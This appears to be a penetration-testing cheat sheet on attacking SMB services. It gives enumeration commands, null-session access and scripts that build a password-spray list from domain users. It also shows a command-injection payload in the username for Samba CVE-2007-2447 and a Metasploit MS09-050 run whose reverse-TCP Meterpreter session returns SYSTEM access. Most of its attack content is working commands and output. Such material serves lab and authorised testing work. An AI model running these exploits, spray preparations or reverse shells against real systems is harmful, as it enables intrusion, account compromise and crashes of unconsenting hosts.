
smb 139,445

SMB Enumeration

Guess the server's version

nmap -p 139,445 $ip --script=smb-os-discovery

Detect the server's version with nmap's aggressive scan (-A enables OS detection, version detection, default scripts and traceroute):

nmap -A 10.10.10.4

Scanning

smbclient

smbclient -NL //ip
smbclient -L ip --port=445 --user=Administrator

smbmap

smbmap -H $ip
smbmap -u <user> -H $ip

Scanning for vulnerabilities

nmap -p 139,445 --script "smb-vuln*" $ip

Quote the glob so the shell does not expand it. Some of these scripts are intrusive (smb-vuln-cve2009-3103 crashes a vulnerable host), so check the script list before running them against systems that must stay up.

Other Tools

NetBIOS information

nbtscan -r $ip

enum4linux

enum4linux -a $ip

rpcclient

rpcclient -U "" -N $ip

Null session: empty username, and -N so it does not prompt for a password.
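Added example, not from the original page: a POSIX shell helper that wraps the null-session share listing above and parses the smbclient -L table into share names, then drops the hidden/administrative ones (names ending in $), which is usually the list worth connecting to first. SAMPLE_LISTING is a constructed imitation of smbclient output with made-up share names; the host is taken from the TARGET variable and is not contacted unless it is set.

```shell
#!/bin/sh
# smb_shares.sh - added example: list SMB shares and pick out the non-admin ones.
# The parsers run on the constructed sample below; list_shares needs smbclient.

# Constructed sample of `smbclient -N -L <host>` output (hypothetical host).
SAMPLE_LISTING=$(cat <<'EOF'

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Data            Disk      Project files
        My Share        Disk      Share with a space in its name
        IPC$            IPC       IPC Service (Samba 4.13.2)
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
Reconnecting with SMB1 for workgroup listing.
SMB1 disabled -- no workgroup available
EOF
)

# Turn the smbclient -L table into one share name per line. A share row is
# recognised by its Type column (Disk, IPC or Printer); every field before it
# is the name, so names containing spaces survive. (A share whose own name ends
# in one of those words is ambiguous and would be cut short.)
parse_shares() {
    awk '
        $1 == "Sharename" || $1 ~ /^-+$/ { next }
        {
            for (i = 2; i <= NF; i++) {
                if ($i == "Disk" || $i == "IPC" || $i == "Printer") {
                    name = $1
                    for (j = 2; j < i; j++) name = name " " $j
                    print name
                    break
                }
            }
        }'
}

# Drop hidden/administrative shares: names ending in "$" (IPC$, ADMIN$, C$, print$).
non_admin_shares() {
    grep -v '\$$' || true
}

# Live: list shares on a host. No user => null session (-N: no password prompt).
list_shares() {
    host=$1
    user=${2:-}
    if [ -n "$user" ]; then
        smbclient -L "$host" -U "$user"
    else
        smbclient -N -L "$host"
    fi
}

# Wrappers over the constructed sample, so the parsers can be exercised offline.
demo_shares()  { printf '%s\n' "$SAMPLE_LISTING" | parse_shares; }
demo_targets() { demo_shares | non_admin_shares; }

# Live run only when a target is given, e.g.  TARGET=10.10.10.4 sh smb_shares.sh
if [ -n "${TARGET:-}" ]; then
    list_shares "$TARGET" "${SMB_USER:-}" | parse_shares | non_admin_shares
fi
```

Feed the output of demo_targets (or the live run) to smbclient //host/share or smbmap -r one share at a time; the $-suffixed shares are still worth trying with real credentials, they are just not where an anonymous session normally gets anything.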

Connect to SMB

smbclient

smbclient //ip/folder
smbclient \\\\ip\\folder -U john 

smbmap

smbmap -H 192.168.11.135 -u windows_10_1903_x64 -p passwd -r 'Users\windows_10_1903_x64\Desktop'

Mount Access

sudo mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//ip/My Share" /mnt/cifs
sudo mount -t cifs -o username=Administrator,password=123456,port=445 //ip/Data /mnt/win10_share

The share (//ip/share) goes before the mount point. A password on the command line ends up in shell history and the process list; mount.cifs(8) accepts credentials=FILE instead.

NFS export (not SMB):

sudo mount -o nolock $ip:/home ~/home/
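Added example, mine rather than the page's: a shell helper for the CIFS mount that keeps the credentials in a mode-0600 file (the credentials= option of mount.cifs(8)) instead of on the command line, and assembles the mount in the order mount expects, source first, mount point second. The host, share and account names in the comments are hypothetical; vers= and sec= are parameters because the legacy sec=ntlm case above also needs vers=1.0.

```shell
#!/bin/sh
# cifs_mount.sh - added example: mount an SMB share with a credentials file
# rather than a password in the argument list.

# Write a mount.cifs(8) credentials file readable only by its owner. The umask
# is set in a subshell so the caller's umask is untouched; any existing file is
# removed first so a looser mode from an earlier run does not survive.
write_cifs_creds() {
    file=$1; user=$2; pass=$3; domain=${4:-}
    (
        umask 077
        rm -f "$file"
        {
            printf 'username=%s\n' "$user"
            printf 'password=%s\n' "$pass"
            if [ -n "$domain" ]; then printf 'domain=%s\n' "$domain"; fi
        } > "$file"
    )
}

# Build the -o option string. Defaults are SMB3 with NTLMSSP; pass 1.0 and ntlm
# for an SMB1-only target (the client must also have SMB1 enabled, see below).
# dir_mode/file_mode keep the mounted tree private to the local user.
cifs_mount_opts() {
    creds=$1; vers=${2:-3.0}; sec=${3:-ntlmssp}
    printf 'credentials=%s,vers=%s,sec=%s,dir_mode=0700,file_mode=0600' "$creds" "$vers" "$sec"
}

# Live: mount //host/share at a mount point. Quoting keeps share names with spaces intact.
cifs_mount() {
    share=$1; mountpoint=$2; creds=$3; vers=${4:-3.0}; sec=${5:-ntlmssp}
    sudo mount -t cifs -o "$(cifs_mount_opts "$creds" "$vers" "$sec")" "$share" "$mountpoint"
}

# Example invocation (hypothetical host, share and account), not run automatically:
#   write_cifs_creds ~/.smbcreds Administrator 'S3cret!' WORKGROUP
#   cifs_mount '//10.10.10.4/My Share' /mnt/cifs ~/.smbcreds
#   cifs_mount //10.10.10.4/Data /mnt/data ~/.smbcreds 1.0 ntlm   # legacy SMB1 target
```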

Windows

Run a binary straight from a share by its UNC path:

\\ip\a\whoami.exe

rpcclient Commands

Run these inside rpcclient, or in one go with rpcclient ... -c 'srvinfo;enumdomusers;...'.

srvinfo            server name and OS version
enumdomusers       domain users with their RIDs
getdompwinfo       password policy (minimum length, complexity flags)
querydominfo       domain name, user and group counts
netshareenum       shares visible to the current account
netshareenumall    all shares, including hidden ($) ones
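Added example, not from the page: the commands above batched into one rpcclient session with -c, plus parsers that turn enumdomusers lines (user:[NAME] rid:[0xHEX]) into a name/RID list and read min_password_length from getdompwinfo. SAMPLE_OUTPUT is a constructed imitation of that output with made-up account names; rpc_enum only contacts a host when TARGET is set.

```shell
#!/bin/sh
# rpc_enum.sh - added example: run the rpcclient commands in one session and
# turn enumdomusers/getdompwinfo output into data a spray list can be built from.
# The parsers run on the constructed sample below; rpc_enum needs rpcclient.

RPC_CMDS='srvinfo;querydominfo;getdompwinfo;enumdomusers;netshareenumall'

# Constructed sample of the getdompwinfo and enumdomusers parts of the output
# (hypothetical domain; the account names are made up).
SAMPLE_OUTPUT=$(cat <<'EOF'
min_password_length: 7
password_properties: 0x00000001
        DOMAIN_PASSWORD_COMPLEX
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_backup] rid:[0x3e8]
user:[j.smith] rid:[0x451]
EOF
)

# Live: all commands over one rpcclient session. Empty user => null session.
rpc_enum() {
    host=$1; user=${2:-}; pass=${3:-}
    if [ -z "$user" ]; then
        rpcclient -U '' -N "$host" -c "$RPC_CMDS"
    else
        rpcclient -U "$user%$pass" "$host" -c "$RPC_CMDS"
    fi
}

# "user:[NAME] rid:[0xHEX]" -> "NAME DECIMAL_RID" (hex converted in plain awk,
# so no gawk-only strtonum is needed).
parse_users() {
    awk '
        function hex2dec(h,   i, v) {
            v = 0; h = tolower(h)
            for (i = 1; i <= length(h); i++)
                v = v * 16 + index("0123456789abcdef", substr(h, i, 1)) - 1
            return v
        }
        /^user:\[/ {
            name = $0; sub(/^user:\[/, "", name); sub(/\].*$/, "", name)
            rid = $0;  sub(/^.*rid:\[0x/, "", rid); sub(/\].*$/, "", rid)
            print name, hex2dec(rid)
        }'
}

# Built-in accounts have well-known RIDs below 1000 (Administrator 500, Guest 501,
# krbtgt 502); ordinary accounts start at 1000, so keep those for the spray list.
spray_candidates() {
    awk '$2 >= 1000 { print $1 }'
}

# Minimum password length from getdompwinfo, to filter the spray wordlist.
min_pw_len() {
    awk '/^min_password_length:/ { print $2 }'
}

# Wrappers over the constructed sample, so the parsers can be exercised offline.
demo_users()  { printf '%s\n' "$SAMPLE_OUTPUT" | parse_users; }
demo_spray()  { demo_users | spray_candidates; }
demo_minlen() { printf '%s\n' "$SAMPLE_OUTPUT" | min_pw_len; }

# Live run only when a target is given, e.g.  TARGET=10.10.10.4 sh rpc_enum.sh
if [ -n "${TARGET:-}" ]; then
    rpc_enum "$TARGET" "${RPC_USER:-}" "${RPC_PASS:-}" | parse_users | spray_candidates
fi
```

Check the lockout values from getdompwinfo before spraying the resulting list; min_password_length tells you which wordlist entries cannot possibly be right and can be dropped.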

Config Samba

Old targets only speak SMB1, which current Samba clients refuse by default. Enable it on the attack box in the [global] section of:

/etc/samba/smb.conf

min protocol = SMB1

smb.conf(5) documents the client-side setting as client min protocol, with NT1 as the name of the SMB1 dialect (client min protocol = NT1); the same can be set for a single command with smbclient --option='client min protocol=NT1'. Leave SMB1 disabled anywhere that is not an attack box.

SMB CVE

Samba 3.0.20 < 3.0.25rc3 - 'username map script' command execution (CVE-2007-2447)

https://www.exploit-db.com/exploits/16320

With the non-default username map script option set, the client-supplied username reaches a shell unescaped, so a backticked command in the username runs with smbd's privileges (root), and before authentication, because the mapping happens first. Quick check: inject a ping and watch for ICMP from the target:

smbmap -u '/=`ping -c 2 ip`' -H ip
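Added example, constructed for this page and not Samba's code: a two-function simulation of the bug class behind CVE-2007-2447 (a username interpolated into a shell command line) next to the argv-based form that fixes it, and a wrapper for the ping check above. MAP_SCRIPT, PAYLOAD and the arguments of usermap_ping_check are assumptions for illustration.

```shell
#!/bin/sh
# usermap_sim.sh - added example (constructed; not Samba's code): why a username
# of the form /=`cmd` executes through a shell-invoked map script, and the fix.
# MAP_SCRIPT stands in for the admin-configured 'username map script'.

MAP_SCRIPT='echo mapped-user'

# Vulnerable pattern: build the command line by string interpolation and hand it
# to a shell. Backticks, ';' and '|' inside the username become shell syntax.
map_user_vulnerable() {
    sh -c "$MAP_SCRIPT $1"
}

# Fixed pattern: the username is a separate argv element that no shell parses.
# ($MAP_SCRIPT is left unquoted on purpose so its own words split; the username is not.)
map_user_safe() {
    $MAP_SCRIPT "$1"
}

# Payload shape from the exploit-db / Metasploit module: "/=" then a backticked
# command. Single quotes stop the backticks from running on the attacker's box.
PAYLOAD='/=`echo PWNED`'

# Live check, same as the page's smbmap one-liner: the injected ping should show
# up on the attacker's interface (tcpdump -ni tun0 icmp). Hypothetical arguments.
usermap_ping_check() {
    target=$1; listener=$2
    smbmap -u '/=`ping -c 2 '"$listener"'`' -H "$target"
}

# Example invocation, not run automatically:
#   usermap_ping_check 10.10.10.3 10.10.14.5
```

map_user_vulnerable "$PAYLOAD" prints "mapped-user /=PWNED" because the inner echo ran; map_user_safe "$PAYLOAD" prints the backticks literally, which is exactly the behaviour the fixed Samba has: the username is data, not code.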

smb-vuln-cve2009-3103 (MS09-050, SMB2 negotiate function index; CVE-2009-3103)

nmap -p 445 --script smb-vuln-cve2009-3103 $ip

The nmap check triggers the bug, so a vulnerable host crashes; run it only where that is acceptable. The Python exploit did not complete here (it prompts for a password and then fails at logon); exploit here:

ExploitDB: https://www.exploit-db.com/exploits/40280

$ python3 MS09_050.py ip
Enter WORKGROUP\Administrator's password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
$ sudo msfconsole -q
use exploit/multi/handler
set lhost tun0
set lport 445
set EXITFUNC thread
run

Using the Metasploit module (a kernel-mode bug in srv2.sys: a failed attempt blue-screens the target, and the only supported target is Vista SP1/SP2 or Server 2008 x86, so confirm the OS first)

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  ip    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   445              yes       The target port (TCP)
   WAIT    180              yes       The number of seconds to wait for the attack to complete.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     445              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)


msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run

[*] Started reverse TCP handler on ip
[*] ip:445 - Connecting to the target (ip:445)...
[*] ip:445 - Sending the exploit packet (951 bytes)...
[*] ip:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (175174 bytes) to ip
[*] Meterpreter session 2 opened (ip:445 -> ip:49159) at 2021-07-06 23:40:40 +0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM